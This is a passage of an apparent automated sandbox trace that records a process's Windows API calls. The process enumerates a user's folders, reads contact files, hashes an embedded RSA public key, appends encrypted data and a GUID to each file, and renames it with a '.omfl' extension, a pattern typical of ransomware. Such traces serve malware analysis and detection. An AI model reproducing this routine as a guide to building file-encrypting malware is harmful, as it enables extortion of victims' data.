wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0130.115] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750c9a0 [0130.115] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.115] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0130.115] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0130.115] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.115] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.116] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0130.116] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0130.116] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2ce0 [0130.116] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0130.116] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750caf0 [0130.116] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0130.116] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0130.116] PathFindFileNameW (pszPath="") returned="" [0130.116] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.116] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0130.116] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0130.116] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe0434360, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe0434360, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0130.116] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5f60 [0130.116] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5fc8 [0130.116] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce9278 [0130.116] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5cf0 [0130.116] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0130.117] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5f60 [0130.117] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5fc8 [0130.117] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x38) returned 0xdce3a70 [0130.117] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5d58 [0130.117] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdc6ce460, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc6ce460, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0130.117] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5f60 [0130.117] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5fc8 [0130.117] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x54) returned 0xdd08ea8 [0130.117] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5a80 [0130.117] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.117] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdc6ce460, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc6ce460, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0130.117] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0130.117] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0130.117] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5f60 [0130.117] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0130.117] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5fc8 [0130.117] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.117] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\") returned="Application Data\\" [0130.117] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750caf0 [0130.117] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2ce0 [0130.118] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0130.118] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0130.118] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0130.118] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0130.118] PathFindFileNameW (pszPath="") returned="" [0130.118] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2d70 [0130.118] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdc6ce460, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc6ce460, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0xffffffff [0130.118] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0130.118] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757ca08 [0130.118] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0130.118] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.118] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.119] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="Contacts\\" [0130.119] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0130.119] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2ce0 [0130.119] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0130.119] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750caf0 [0130.119] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0130.119] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0130.119] PathFindFileNameW (pszPath="") returned="" [0130.119] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5f60 [0130.119] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0130.119] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0130.119] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 1 [0130.119] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.119] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3088 [0130.120] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned=".contact" [0130.120] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.121] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=1178) returned 1 [0130.121] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.124] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x474, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.124] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.126] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.126] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x49a, lpOverlapped=0x0) returned 1 [0130.126] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.126] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0130.126] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.126] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.126] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3198) returned 1 [0130.128] CryptCreateHash (in: hProv=0x49d3198, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.128] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.128] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.128] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0130.129] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.129] GetLastError () returned 0x0 [0130.129] SetLastError (dwErrCode=0x0) [0130.129] GetLastError () returned 0x0 [0130.129] SetLastError (dwErrCode=0x0) [0130.129] GetLastError () returned 0x0 [0130.129] SetLastError (dwErrCode=0x0) [0130.129] GetLastError () returned 0x0 [0130.129] SetLastError (dwErrCode=0x0) [0130.129] GetLastError () returned 0x0 [0130.129] SetLastError (dwErrCode=0x0) [0130.129] GetLastError () returned 0x0 [0130.129] SetLastError (dwErrCode=0x0) [0130.129] GetLastError () returned 0x0 [0130.129] SetLastError (dwErrCode=0x0) [0130.129] GetLastError () returned 0x0 [0130.129] SetLastError (dwErrCode=0x0) [0130.129] GetLastError () returned 0x0 [0130.129] SetLastError (dwErrCode=0x0) [0130.129] GetLastError () returned 0x0 [0130.129] SetLastError (dwErrCode=0x0) [0130.129] GetLastError () returned 0x0 [0130.129] SetLastError (dwErrCode=0x0) [0130.130] GetLastError () returned 0x0 [0130.130] SetLastError (dwErrCode=0x0) [0130.130] GetLastError () returned 0x0 [0130.130] SetLastError (dwErrCode=0x0) [0130.130] GetLastError () returned 0x0 [0130.130] SetLastError (dwErrCode=0x0) [0130.130] GetLastError () returned 0x0 [0130.130] SetLastError (dwErrCode=0x0) [0130.130] GetLastError () returned 0x0 [0130.130] SetLastError (dwErrCode=0x0) [0130.130] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0130.130] GetLastError () returned 0x0 [0130.130] SetLastError (dwErrCode=0x0) [0130.130] GetLastError () returned 0x0 [0130.130] SetLastError (dwErrCode=0x0) [0130.130] GetLastError () returned 0x0 [0130.130] SetLastError (dwErrCode=0x0) [0130.130] GetLastError () returned 0x0 [0130.130] SetLastError (dwErrCode=0x0) [0130.130] GetLastError () returned 0x0 [0130.130] SetLastError (dwErrCode=0x0) [0130.130] GetLastError () returned 0x0 [0130.130] SetLastError (dwErrCode=0x0) [0130.130] GetLastError () returned 0x0 [0130.131] SetLastError (dwErrCode=0x0) [0130.131] GetLastError () returned 0x0 [0130.131] SetLastError (dwErrCode=0x0) [0130.131] GetLastError () returned 0x0 [0130.131] SetLastError (dwErrCode=0x0) [0130.131] GetLastError () returned 0x0 [0130.131] SetLastError (dwErrCode=0x0) [0130.131] GetLastError () returned 0x0 [0130.131] SetLastError (dwErrCode=0x0) [0130.131] GetLastError () returned 0x0 [0130.131] SetLastError (dwErrCode=0x0) [0130.131] GetLastError () returned 0x0 [0130.131] SetLastError (dwErrCode=0x0) [0130.131] GetLastError () returned 0x0 [0130.131] SetLastError (dwErrCode=0x0) [0130.131] GetLastError () returned 0x0 [0130.131] SetLastError (dwErrCode=0x0) [0130.131] GetLastError () returned 0x0 [0130.131] SetLastError (dwErrCode=0x0) [0130.131] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.131] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.131] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdf28 | out: hHeap=0x4970000) returned 1 [0130.131] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.131] CryptReleaseContext (hProv=0x49d3198, dwFlags=0x0) returned 1 [0130.132] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.132] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.132] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.132] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.132] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.132] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.132] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.132] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4a0) returned 0x757b558 [0130.132] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0130.132] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0130.132] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0130.132] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.132] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0130.132] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0130.132] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2ce0 [0130.132] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd168f0 [0130.132] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d70 [0130.132] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16980 [0130.132] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd169b0 [0130.132] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0130.132] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd169c8 [0130.132] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0130.132] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdcfae58 [0130.132] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdcfae58, Size=0x218) returned 0xdce0a50 [0130.132] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0130.133] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd169b0 | out: hHeap=0x4970000) returned 1 [0130.133] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd169c8 | out: hHeap=0x4970000) returned 1 [0130.133] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.133] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0130.133] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0130.133] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0130.133] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x49a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.133] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.134] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0130.134] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.134] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.134] CloseHandle (hObject=0x5c8) returned 1 [0130.139] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.omfl")) returned 1 [0130.140] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.140] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.140] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0130.142] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3088 | out: hHeap=0x4970000) returned 1 [0130.142] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0130.142] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned=".contact" [0130.142] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.142] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=68382) returned 1 [0130.143] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, 